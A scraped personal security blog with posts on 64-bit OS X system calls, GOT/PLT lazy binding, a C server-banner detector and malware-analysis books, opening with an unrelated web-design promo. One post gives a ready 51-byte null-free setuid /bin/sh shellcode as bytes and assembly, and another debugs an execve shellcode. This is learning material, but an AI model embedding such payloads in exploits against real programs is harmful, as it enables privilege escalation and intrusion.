Security Development

Choosing a Good Web Design Team for Your Business

I remember building my first website as a young man. It was fun to spend all those hours learning how to do it. My main motivation was to show off for friends and family. I built a bunch of websites that were very basic, but they looked like masterpieces to people who knew nothing about the Internet or websites. I am very embarrassed about my efforts. I never went anywhere with it even though I considered I might make it a career back then. The company I own as an adult uses a firm that does website design in Michigan. I could not even begin to build anything now. I barely even remember a couple of basic HTML tags.

The point I am making is that we should leave some things to professionals. We should consult people who have a proven track record. I remember the early days of the Internet, when small business owners let employees or relatives with some web experience build their online presence. That was never a good idea.

T-Mobile 4G Hotspot Multiple Vulnerabilities


Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.

Link to Product on T-Mobile’s Website


  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.


Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

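; File: shell.s
; Author: Dustin Schultz

section .text
global start

start:
xor rdx, rdx                 ; envp = NULL
mov eax, 0x200003b           ; execve in the Unix syscall class
mov rdi, 0x68732f2f6e69622f  ; "/bin//sh"
push rsi                     ; rsi has not been initialized at this point
push rdi
mov rdi, rsp                 ; rdi = pointer to the string on the stack
syscall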

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11

otool has the same output:

dustin@sholtz:~$ otool -tv static 
(__TEXT,__text) section
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
(__TEXT,__text) section
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

As pointed out in the comments, I was not initializing rsi (the argv argument to execve) correctly! Thanks for pointing that out. The fix was to add this just before the syscall:

push rdx
push rdi
mov rsi, rsp
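
As a side note on the listing above, the 64-bit immediate moved into rdi is just the string /bin//sh stored little-endian. Here is a minimal Python sketch to check that; the helper name is my own and only there for illustration.

```python
import struct

# Immediate loaded into rdi in shell.s.
IMMEDIATE = 0x68732F2F6E69622F


def immediate_to_bytes(value):
    """Return the 8 bytes a little-endian 64-bit push places in memory."""
    return struct.pack("<Q", value)


print(immediate_to_bytes(IMMEDIATE))
```

The doubled slash is a common trick to pad the path to exactly eight bytes so it fits in one register.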

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
00000000000168ac	movl	$0x02000184,%eax
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
00000000000173f4	movl	$0x0200000d,%eax

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting set up, but this is definitely where the syscall number is moved into rax. The wrapper copies rcx into r10 first because rcx gets clobbered when syscall is invoked, so the fourth argument has to travel in r10 instead.
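
To read the values that land in eax, it helps to split them into a class and a number. The sketch below assumes the class sits above bit 24, which matches the 0x02 prefix on these values. The sample lines are copied from the otool output above, and the function names are made up for illustration.

```python
import re

# movl lines copied from the otool output above.
OTOOL_LINES = """\
0000000000016898 movl $0x0200017c,%eax
00000000000168ac movl $0x02000184,%eax
00000000000173e0 movl $0x0200003b,%eax
00000000000173f4 movl $0x0200000d,%eax
"""

CLASS_SHIFT = 24  # assumption: the class is stored above bit 24


def split_syscall(value):
    """Return (class, number) for a 64-bit OS X syscall value."""
    return value >> CLASS_SHIFT, value & ((1 << CLASS_SHIFT) - 1)


def syscalls_in(text):
    """Find every 'movl $imm,%eax' and decode its immediate."""
    pattern = re.compile(r"movl\s+\$0x([0-9a-fA-F]+),%eax")
    return [split_syscall(int(m.group(1), 16)) for m in pattern.finditer(text)]


for syscall_class, number in syscalls_in(OTOOL_LINES):
    print(syscall_class, number)
```

The third entry decodes to class 2, number 59, which is the execve value used in the shellcode.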

A Textbook Buffer Overflow: A Look at the FreeBSD telnetd Code

Wow, I feel really sorry for the FreeBSD guys having to announce a remotely exploitable vulnerability in their Telnet daemon on Christmas Eve! Let’s just hope that nobody uses Telnet anymore.

Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap

I’ve been meaning to post about this technique, which I figured out while developing the OS X x86_64 setuid/shell shellcode [1] [2] I posted about last week, but school and work have been pretty busy. It’s a simple technique that still lets you test your shellcode on Unix-based OSes with non-executable stacks and heaps, and it can come in pretty handy for making sure your shellcode is right.


Just Arrived: Malware Analyst’s Cookbook

Author Michael Ligh was very gracious to send me a review copy of his new book Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code. I took a quick browse through it when I opened it and it looks REALLY GOOD. If it’s anything like the articles on Michael’s website, I know I’m in for a damn good read!

I’m planning on starting it this Saturday due to some other priorities, so heads up for a review post in the future, or check it out for yourself:

Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code (Paperback)

By (author): Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard

A computer forensics “how-to” for fighting malicious code and analyzing incidents

With our ever-increasing reliance on computers comes an ever-growing risk of malware. Security professionals will find plenty of solutions in this book to the problems posed by viruses, Trojan horses, worms, spyware, rootkits, adware, and other invasive software. Written by well-known malware experts, this guide reveals solutions to numerous problems and includes a DVD of custom programs and tools that illustrate the concepts, enhancing your skills.

  • Security professionals face a constant battle against malicious software; this practical manual will improve your analytical capabilities and provide dozens of valuable and innovative solutions
  • Covers classifying malware, packing and unpacking, dynamic malware analysis, decoding and decrypting, rootkit detection, memory forensics, open source malware research, and much more
  • Includes generous amounts of source code in C, Python, and Perl to extend your favorite tools or build new ones, and custom programs on the DVD to demonstrate the solutions

Malware Analyst’s Cookbook is indispensable to IT security administrators, incident responders, forensic analysts, and malware researchers.


51 Byte x86_64 OS X Null Free Shellcode

It doesn’t seem like there’s a lot of x86_64 shellcode out there for the Intel Mac platforms, so I figured I’d write my own and share it. I’m using Mac OS X 10.6.5 at the time of this post.

Instead of starting with the source and ending with the shellcode, we’re going to throw this one in reverse and get right to the shellcode. So here you have it, a 51 byte Mac OS X 64 bit setuid/shell-spawning shellcode:

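/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X / Intel x86_64
 *
 *  Created on: Nov 25, 2010
 *      Author: Dustin Schultz
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";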


And now for the source in NASM/YASM syntax. If you’ve never done system calls on 64 bit OS X and you’re confused, be sure to read my post on 64 bit system calls in OS X.

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz

section .text
global start

start:
 mov r8b, 0x02          ; Unix class system calls = 2 
 shl r8, 24             ; shift left 24 to the upper order bits
 or r8, 0x17            ; setuid = 23, or with class = 0x2000017
 xor edi, edi           ; zero out edi 
 mov rax, r8            ; syscall number in rax 
 syscall                ; invoke kernel
 jmp short c            ; jump to c
b:
 pop rdi                ; pop ret addr which = addr of /bin/sh
 add r8, 0x24           ; execve = 59, 0x24+r8=0x200003b
 mov rax, r8            ; syscall number in rax 
 xor rdx, rdx           ; zero out rdx 
 push rdx               ; NULL terminator for argv, pushed backwards
 push rdi               ; push rdi = pointer to /bin/sh
 mov rsi, rsp           ; rsi = argv (pointer to /bin/sh, then NULL)
 syscall                ; invoke the kernel
c:
 call b                 ; call b, push ret of /bin/sh
 db '/bin//sh'          ; /bin/sh string

I would never blindly use shellcode without testing it out myself (unless it’s from a trusted source like Metasploit).

nobody@nobody:~/$ nasm -f macho64 setuid_shell_x86_64.asm 
nobody@nobody:~/$ ld -arch x86_64 setuid_shell_x86_64.o
nobody@nobody:~/$ ./a.out 

And the final byte representation (verify against C source above)

nobody@nobody:~/$ otool -t setuid_shell_x86_64.o
(__TEXT,__text) section
0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52 
0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f 
0000000000000030 2f 73 68 
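
The checks behind the title (51 bytes, no nulls) are easy to automate. This is a rough Python sketch, not part of my original workflow: it parses the otool dump above, counts the bytes, looks for nulls, and prints a C string literal. The function names are my own.

```python
OTOOL_DUMP = """\
0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0
0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52
0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f
0000000000000030 2f 73 68
"""


def dump_to_bytes(dump):
    """Drop the offset column and collect the hex byte columns."""
    data = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        data.extend(int(field, 16) for field in fields[1:])
    return bytes(data)


def as_c_literal(data, per_line=16):
    """Format bytes as adjacent C string literals, one row per line."""
    rows = []
    for start in range(0, len(data), per_line):
        chunk = data[start:start + per_line]
        rows.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "\n".join(rows) + ";"


shellcode = dump_to_bytes(OTOOL_DUMP)
print(len(shellcode), "bytes, null-free:", 0 not in shellcode)
print(as_c_literal(shellcode))
```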

And that’s all. Be sure to check back in the future or subscribe to my RSS feed. I definitely have more shellcode to come!

Mac OS X 64 bit Assembly System Calls

After reading about shellcode in Chapter 5 of Hacking: The Art of Exploitation, I wanted to go back through some of the examples and try them out. The first example was a simple Hello World program in Intel assembly. I followed along in the book and had no problems reproducing results on a 32 bit Linux VM using nasm with elf file format and ld for linking.

Then I decided I wanted to try something similar but with a little bit of a challenge: write a Mac OS X 64 bit “hello world” program using the new fast ‘syscall’ instruction instead of the software interrupt based (int 0x80) system call. This is where things got interesting.

First and foremost, the version of NASM that comes with Mac OS X is really old. If you want to assemble macho64 code, you’ll need to download the latest version.

nobody@nobody:~$ nasm -v
NASM version 2.09.03 compiled on Oct 27 2010

I figured I could replace the extended registers with the 64 bit registers and the int 0x80 call with a syscall instruction, so my first attempt was something like this:

section .data
hello_world     db      "Hello World!", 0x0a

section .text
global _start

_start:
mov rax, 4              ; System call write = 4
mov rbx, 1              ; Write to standard out = 1
mov rcx, hello_world    ; The address of hello_world string
mov rdx, 13             ; The size to write (12 characters + newline)
syscall                 ; Invoke the kernel
mov rax, 1              ; System call number for exit = 1
mov rbx, 0              ; Exit success = 0
syscall                 ; Invoke the kernel

After assembling and linking, I got this

nobody@nobody:~$ nasm -f macho64 helloworld.s
nobody@nobody:~$ ld helloworld.o 
ld: could not find entry point "start" (perhaps missing crt1.o) for inferred architecture x86_64

Apparently Mac OS X doesn’t use ‘_start’ as the entry point; it just uses ‘start’. After removing the underscore prefix from start, I was able to link, but when I ran the program I got this:

nobody@nobody:~$ ./a.out
Bus error

I was pretty stumped at this point so I headed off to Google to figure out how I was supposed to use the ‘syscall’ instruction. After a bunch of confusion, I stumbled upon the documentation and realized that x86_64 uses entirely different registers for passing arguments. From the documentation:

The number of the syscall has to be passed in register rax.

rdi - used to pass 1st argument to functions
rsi - used to pass 2nd argument to functions
rdx - used to pass 3rd argument to functions
rcx - used to pass 4th argument to functions
r8 - used to pass 5th argument to functions
r9 - used to pass 6th argument to functions

A system-call is done via the syscall instruction. The kernel destroys registers rcx and r11.

So I tweaked the code with this new information

mov rax, 4              ; System call write = 4
mov rdi, 1              ; Write to standard out = 1
mov rsi, hello_world    ; The address of hello_world string
mov rdx, 13             ; The size to write (12 characters + newline)
syscall                 ; Invoke the kernel
mov rax, 1              ; System call number for exit = 1
mov rdi, 0              ; Exit success = 0
syscall                 ; Invoke the kernel

And with high hopes that I’d see “Hello World!” on the console, I still got the exact same ‘Bus error’ after assembling and linking. Back to Google to see if others had tried a write syscall on Mac OS X. I found a few posts from people having success with the syscall number 0x2000004, so I thought I’d give it a try. Similarly, the exit syscall number was 0x2000001. I tweaked the code and BINGO! I was now able to see “Hello World!” on my console, but I was seriously confused at this point: what was this magic number 0x2000000 that was being added to the standard syscall numbers?

I looked in syscall.h to see if this was some sort of padding (for security?). I grepped all of /usr/include for 0x2000000 and found no hints whatsoever. I looked into the Mach-O file format to see if it was related to that, with no luck.

After about an hour and a half of looking, I spotted what I was looking for in ‘syscall_sw.h’

/*
 * Syscall classes for 64-bit system call entry.
 * For 64-bit users, the 32-bit syscall number is partitioned
 * with the high-order bits representing the class and low-order
 * bits being the syscall number within that class.
 * The high-order 32-bits of the 64-bit syscall number are unused.
 * All system classes enter the kernel via the syscall instruction.
 * These are not #ifdef'd for x86-64 because they might be used for
 * 32-bit someday and so the 64-bit comm page in a 32-bit kernel
 * can use them.
 */

#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */	
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */

Mac OS X (or likely BSD) has split the system call numbers into several different “classes.” The upper order bits of the syscall number represent the class of the system call. In the case of write and exit, it’s SYSCALL_CLASS_UNIX and hence the upper order bits are 2! Thus, every Unix system call will be (0x2000000 + unix syscall #).
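
The arithmetic is small enough to sketch in a few lines of Python. The class value comes from the header excerpt above. The shift of 24 is my assumption, based on the 0x2000000 prefix, and the helper name is only illustrative.

```python
SYSCALL_CLASS_UNIX = 2      # from the header excerpt above
SYSCALL_CLASS_SHIFT = 24    # assumption: 2 << 24 == 0x2000000


def unix_syscall(number):
    """Combine the Unix class with a plain BSD syscall number."""
    return (SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | number


for name, number in (("exit", 1), ("write", 4), ("setuid", 23), ("execve", 59)):
    print(name, hex(unix_syscall(number)))
```

The same helper reproduces the 0x2000017 (setuid) and 0x200003b (execve) values that show up in the shellcode posts.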

Armed with this information, here’s the final x86_64 Mach-o “Hello World”

section .data
hello_world     db      "Hello World!", 0x0a

section .text
global start

start:
mov rax, 0x2000004      ; System call write = 4
mov rdi, 1              ; Write to standard out = 1
mov rsi, hello_world    ; The address of hello_world string
mov rdx, 13             ; The size to write (12 characters + newline)
syscall                 ; Invoke the kernel
mov rax, 0x2000001      ; System call number for exit = 1
mov rdi, 0              ; Exit success = 0
syscall                 ; Invoke the kernel

nobody@nobody:~$ nasm -f macho64 helloworld.s
nobody@nobody:~$ ld helloworld.o 
nobody@nobody:~$ ./a.out
Hello World!

Simple HTTP Server Detector

The preamble to this post is that you can do this in a few lines with CURL, telnet, wget etc. I’m also sure someone has already written one of these but coming from a Java background, it was useful for me (and may be to others) to write a simple application that uses sockets in C.

Very Simple HTTP Server Detector 1.0

(I was laughing when I wrote that title)

nobody@nobody:~/$ ./detect
Usage: ./detect < domainname >

Output looks like this

nobody@nobody:~/$ ./detect
Server: Microsoft-IIS/7.5

nobody@nobody:~/$ ./detect
Server: Apache

nobody@nobody:~/$ ./detect
Server: gws

nobody@nobody:~/$ ./detect
Server: unknown

nobody@nobody:~/$ ./detect
Server: AkamaiGHost

nobody@nobody:~/$ ./detect
Server: hi <=== LOL!!

If you’re new to C, see if you can come up with an implementation on your own and then check out the reference below (heavily commented for understanding):

/*
 * Simple HTTP Server Detector
 * Copyleft 2010.
 * All rights have been wronged.
 *
 *  Created on: Oct 5, 2010
 *      Author: xploit
 */
#include <stdio.h> /* printf, fprintf */
#include <stdlib.h> /* exit */
#include <sys/types.h> /* ssize_t */
#include <sys/socket.h> /* sockets */
#include <netinet/in.h> /* sockaddr_in, htons */
#include <netdb.h> /* Host lookup */
#include <string.h> /* memcpy, memset, strstr */

/* HTTP port */
#define WEB_PORT 80
/* Receive buffer size */
#define RECV_BUF 1024
/* Server buffer size */
#define SRVR_BUF 256

void fatal(char *error);

int main(int argc, char **argv) {

	int socket_fd, i;
	ssize_t received;
	struct sockaddr_in remote_addr;
	struct hostent *remote_host;
	char recv_buf[RECV_BUF], srvr[SRVR_BUF];

	if (argc < 2) {
		printf("Usage: %s <domainname>\n", argv[0]);
		exit(1);
	}

	/* Create a socket */
	if ((socket_fd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		fatal("Failed to create socket\n");
	}

	/* Resolve the domain name */
	if ((remote_host = gethostbyname(argv[1])) == NULL) {
		fatal("Failed to resolve domain name\n");
	}

	/* Set address and port of remote host */
	memcpy(&(remote_addr.sin_addr), remote_host->h_addr_list[0],
			remote_host->h_length);
	remote_addr.sin_family = AF_INET;
	remote_addr.sin_port = htons(WEB_PORT);

	/* Zero out the rest of the struct */
	memset(&(remote_addr.sin_zero), 0, 8);

	/* Connect to the domain */
	if ((connect(socket_fd, (struct sockaddr *) &remote_addr,
			sizeof(struct sockaddr))) == -1) {
		fatal("Unable to connect to domain\n");
	}

	/* Send a HTTP head req */
	if ((send(socket_fd, "HEAD / HTTP/1.0\r\n\r\n", 19, 0)) == -1) {
		fatal("Error sending HEAD request\n");
	}

	/* Receive the response, leaving room for a terminator */
	if ((received = recv(socket_fd, recv_buf, RECV_BUF - 1, 0)) == -1) {
		fatal("Error reading HEAD response\n");
	}
	recv_buf[received] = '\0';

	/* Find the server substring */
	char *srvr_ptr = strstr(recv_buf, "Server:");

	/* Fail if it wasn't found */
	if (srvr_ptr == NULL) {
		fatal("Server: unknown\n");
	}

	/* Read server line, stopping at the end of the line or buffer */
	i = 0;
	while (srvr_ptr[i] != '\r' && srvr_ptr[i] != '\n'
			&& srvr_ptr[i] != '\0' && i < SRVR_BUF - 1) {
		srvr[i] = srvr_ptr[i];
		i++;
	}
	/* Terminate String */
	srvr[i] = '\0';

	/* Clear string */
	srvr_ptr = NULL;

	/* Print the results */
	printf("%s\n", srvr);

	/* Stop both reception and transmission */
	shutdown(socket_fd, 2);

	return 0;
}

/* Prints an error and exits */
void fatal(char *error) {
	fprintf(stderr, "%s", error);
	exit(1);
}
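
For comparison, the header-parsing step on its own is only a few lines in Python. This is a sketch that works on a canned response rather than a live socket. The sample response and the function name are made up for illustration, and the header match is case-insensitive, which is a small change from the C version.

```python
# Made-up HEAD response used only to exercise the parser.
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def server_header(response):
    """Return the value of the Server header, or 'unknown' if absent."""
    head = response.split(b"\r\n\r\n", 1)[0]
    # Skip the status line, then look at each "Name: value" pair.
    for line in head.split(b"\r\n")[1:]:
        name, separator, value = line.partition(b":")
        if separator and name.strip().lower() == b"server":
            return value.strip().decode("latin-1")
    return "unknown"


print("Server:", server_header(SAMPLE_RESPONSE))
```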

How is glibc loaded at runtime?

I’ve been looking into address-space layout randomization (ASLR). ASLR relies on randomizing the base address of things like shared libraries, making return-to-libc attacks more difficult. I understood the basics of ASLR but I still had a lot of questions. How are shared libraries, like libc, loaded at runtime? What is the global offset table? What is the procedure linkage table? What is a position independent executable? In this post, we’re going to look at all of these.

Back in the Day

In “the olden days” libraries used to be hard coded to be loaded at a fixed address in memory space. Runtime linkers had to deal with relocating conflicting hard coded addresses. Windows, to some extent, still does this.

PIC – Position Independent Code

Then came along Position Independent Code which simply means that the code (usually shared libraries) can be loaded at any address in memory-space and relocations are no longer a problem. In order to do that, binaries added sections for the GOT and the PLT.

Global Offset Table

Every dynamically linked ELF executable has a section called the Global Offset Table, or GOT for short. This table is responsible for holding the absolute addresses of functions in shared libraries linked dynamically at runtime.

nobody@nobody:~$ objdump -R ./hello_world

./hello_world:     file format elf32-i386

OFFSET   TYPE              VALUE
08049564 R_386_GLOB_DAT    __gmon_start__
08049574 R_386_JUMP_SLOT   __gmon_start__
08049578 R_386_JUMP_SLOT   __libc_start_main
0804957c R_386_JUMP_SLOT   printf
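
The relocation listing above is easy to turn into a lookup table if you want to script against it. Here is a small Python sketch that parses text shaped like the objdump -R output; the function name is mine and the parsing is deliberately naive.

```python
# Relocation records copied from the objdump -R output above.
OBJDUMP_R = """\
OFFSET   TYPE              VALUE
08049564 R_386_GLOB_DAT    __gmon_start__
08049574 R_386_JUMP_SLOT   __gmon_start__
08049578 R_386_JUMP_SLOT   __libc_start_main
0804957c R_386_JUMP_SLOT   printf
"""


def jump_slots(text):
    """Map each symbol with a JUMP_SLOT relocation to its GOT slot address."""
    slots = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[1] == "R_386_JUMP_SLOT":
            slots[parts[2]] = int(parts[0], 16)
    return slots


print(hex(jump_slots(OBJDUMP_R)["printf"]))
```
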

Procedure Linkage Table

Just like the GOT, every dynamically linked ELF executable also has a section called the Procedure Linkage Table, or PLT for short (not to be confused with a BLT (Bacon Lettuce Tomato)). If you’ve read disassembled code, you’ll often see function calls like ‘printf@plt’; that’s a call to the printf entry in the procedure linkage table. The PLT is sort of like the springboard that allows us to resolve the absolute addresses of functions in shared libraries at runtime.

nobody@nobody:~$ objdump -d -j .plt ./hello_world

./hello_world:     file format elf32-i386

Disassembly of section .plt:

08048270 <__gmon_start__@plt-0x10>:
 8048270:       ff 35 6c 95 04 08       pushl  0x804956c
 8048276:       ff 25 70 95 04 08       jmp    *0x8049570
 804827c:       00 00                   add    %al,(%eax)

08048280 <__gmon_start__@plt>:
 8048280:       ff 25 74 95 04 08       jmp    *0x8049574
 8048286:       68 00 00 00 00          push   $0x0
 804828b:       e9 e0 ff ff ff          jmp    8048270 <_init+0x18>

08048290 <__libc_start_main@plt>:
 8048290:       ff 25 78 95 04 08       jmp    *0x8049578
 8048296:       68 08 00 00 00          push   $0x8
 804829b:       e9 d0 ff ff ff          jmp    8048270 <_init+0x18>

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>

The GOT, The PLT, and the Linker

How do these all work together to load a shared library at runtime? Well, it’s actually pretty cool. Let’s walk through the first call to printf. Printf@plt, which is not really printf but a location in the PLT, is called and the first jump is executed.

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>

Notice that this jump is a pointer to an address. We’re going to jump to the address pointed to by this address. The 0x804957c is an address in the GOT. The GOT will eventually hold the absolute address call to printf, however, on the very first call the address will point back to the instruction after the jump in the PLT – 0x80482a6. We can see this below by looking at the output of the GOT. Essentially we’ll execute all of the instructions of the printf@plt the very first call.

(gdb) x/8x 0x804957c-20
0x8049568 <_GLOBAL_OFFSET_TABLE_>:      0x0804949c      0xb80016e0      0xb7ff92f0      0x08048286
0x8049578 <_GLOBAL_OFFSET_TABLE_+16>:   0xb7eafde0      0x080482a6      0x00000000      0x00000000

In the PLT code, an offset is pushed onto the stack and another jmp is executed

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>

This jump goes into the runtime linker code that will eventually load the shared library which contains printf. The offset, $0x10, that was pushed onto the stack tells the linker code the offset of the symbol in the relocation table (see objdump -R ./hello_world output above), printf in this case. The linker will then write the address of printf into the GOT at 0x804957c. We can see this if we look at the GOT after the library has been loaded.

(gdb) x/8x 0x804957c-20
0x8049568 <_GLOBAL_OFFSET_TABLE_>:      0x0804949c      0xb80016e0      0xb7ff92f0      0x08048286
0x8049578 <_GLOBAL_OFFSET_TABLE_+16>:   0xb7eafde0      0xb7edf620      0x00000000      0x00000000

Notice that the previous address, 0x80482a6, has been replaced by the linker with 0xb7edf620. To confirm that this is indeed the address of printf, we can disassemble starting at this address:

(gdb) disassemble 0xb7edf620
Dump of assembler code for function printf:

Since the library is now loaded and the GOT has been overwritten with the absolute address to printf, subsequent calls to the function printf@plt will jump directly to the address of printf!

All of this also has the added benefit that a function in a shared library is not resolved until the first time it is called. In other words, a nice form of “lazy-loading!”
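
Here is a toy Python model of the walkthrough above. It is only a sketch of the control flow, not how the real linker is written: the class and method names are made up, and the three addresses are the ones from the gdb and objdump output in this post.

```python
PRINTF_GOT_SLOT = 0x804957C   # GOT entry used by printf@plt
PRINTF_PLT_PUSH = 0x80482A6   # the push right after the first jmp in the PLT
PRINTF_IN_LIBC = 0xB7EDF620   # where printf actually lives once resolved


class ToyLazyBinder:
    """Models one GOT slot and counts trips through the resolver."""

    def __init__(self):
        # Before the first call the slot points back into the PLT.
        self.got = {PRINTF_GOT_SLOT: PRINTF_PLT_PUSH}
        self.resolver_calls = 0

    def _resolve(self, slot):
        # Stand-in for the runtime linker patching the GOT.
        self.resolver_calls += 1
        self.got[slot] = PRINTF_IN_LIBC

    def call_printf_at_plt(self):
        target = self.got[PRINTF_GOT_SLOT]      # jmp *0x804957c
        if target == PRINTF_PLT_PUSH:           # fell through to push/jmp
            self._resolve(PRINTF_GOT_SLOT)
            target = self.got[PRINTF_GOT_SLOT]
        return target


binder = ToyLazyBinder()
print(hex(binder.call_printf_at_plt()), binder.resolver_calls)
print(hex(binder.call_printf_at_plt()), binder.resolver_calls)
```

The second call never reaches the resolver, which is the whole point of patching the GOT on first use.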

Learning about malware analysis

Like my previous post on wanting to learn more about rootkits, I’d love to learn more about malware analysis. How do antivirus companies reverse engineer malware that they find? How does the FBI get clues to the origin of malware? I’m sure there is tons of stuff online to read, but I’m also going to check out this book (so much to learn!)

Malware Forensics: Investigating and Analyzing Malicious Code covers the emerging and evolving field of “live forensics,” where investigators examine a computer system to collect and preserve critical live data that may be lost if the system is shut down. Unlike other forensic texts that discuss “live forensics” on a particular operating system, or in a generic context, this book emphasizes a live forensics and evidence collection methodology on both Windows and Linux operating systems in the context of identifying and capturing malicious code and evidence of its effect on the compromised system.
Malware Forensics: Investigating and Analyzing Malicious Code also devotes extensive coverage of the burgeoning forensic field of physical and process memory analysis on both Windows and Linux platforms. This book provides clear and concise guidance as to how to forensically capture and examine physical and process memory as a key investigative step in malicious code forensics.
Prior to this book, competing texts have described malicious code, accounted for its evolutionary history, and in some instances, dedicated a mere chapter or two to analyzing malicious code. Conversely, Malware Forensics: Investigating and Analyzing Malicious Code emphasizes the practical “how-to” aspect of malicious code investigation, giving deep coverage on the tools and techniques of conducting runtime behavioral malware analysis (such as file, registry, network and port monitoring) and static code analysis (such as file identification and profiling, strings discovery, armoring/packing detection, disassembling, debugging), and more.

* Winner of Best Book Bejtlich read in 2008!
* Authors have investigated and prosecuted federal malware cases, which allows them to provide unparalleled insight to the reader.
* First book to detail how to perform “live forensic” techniques on malicious code.
* In addition to the technical topics discussed, this book also offers critical legal considerations addressing the legal ramifications and requirements governing the subject matter

I’d love to get my hands on some of these binaries and dive in. If anyone happens to have any of these to analyze, please contact me!
Zeus Bot


ASLR, Dynamic Linkers, & Mmap

Well I had hoped to learn more about Address Space Layout Randomization (ASLR) and blog about it after reading “On the Effectiveness of Address-Space Layout Randomization.” I got about a quarter of the way through the paper and realized that I need to better understand address space layout in general. Where is libc in memory and how do programs get access to it?

I’ve been Googling and reading for the last 3.5 hours and am somewhat more informed but I’m still trying to figure it all out.

Every dynamically linked ELF executable on Linux invokes the dynamic linker, which is the bootstrap for finding and loading all other shared libraries (.so extensions). I think that the linker uses mmap() to memory map the shared libraries from disk into the virtual address space, but I’m still somewhat confused on this part.

Mmap was another thing I wasn’t familiar with. Memory mapped files essentially allow a program to refer to a file as if it were in memory by paging page-sized chunks of it into memory. For writing files, it has the advantage that many small writes happen in memory and then the virtual memory manager writes the page to disk all at once. I’m still trying to figure out what the advantage of mmap’ing shared libraries is. For shared libraries, mmap is used to map the library into the process’s address space as if the process contained the library in its memory. According to what I read, mmap can be used to map “shared memory objects” as well as files, etc. Basically anything that has a file descriptor can be memory mapped.
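
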